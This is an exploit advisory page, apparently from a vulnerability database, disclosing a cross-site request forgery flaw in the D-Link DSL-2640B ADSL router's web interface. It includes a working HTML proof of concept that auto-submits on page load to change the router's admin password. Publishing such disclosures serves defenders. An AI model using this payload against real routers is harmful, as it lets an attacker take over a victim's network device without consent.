D-Link DSL-2640B Cross Site Request Forgery

2012-02-21 / 2012-10-10
Credit: Ivano Binetti
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : D-Link DSL-2640B (ADSL Router) CSRF Vulnerability # Date : 19-02-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Vendor site : http://www.d-link.com # Version : DSL-2640B # Tested on : Firmware Version: EU_4.00; Hardware Version: B2 +--------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------[Change Admin Account Password by Ivano Binetti]--------------------------------------------------+ Summary 1)Introduction 2)Vulnerability Description 3)Exploit +---------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction D-Link DSL-2640B is an ADSL Router using (also) a web management interface. 2)Vulnerability Description The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters and -among other things- to change default administrator("admin") password. 3)Exploit <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to change ADMIN password</H2> <form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1"> </form> </body> </html> +----------------------------------------------------------------------------------------------------------------------------------+

References:

http://ivanobinetti.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top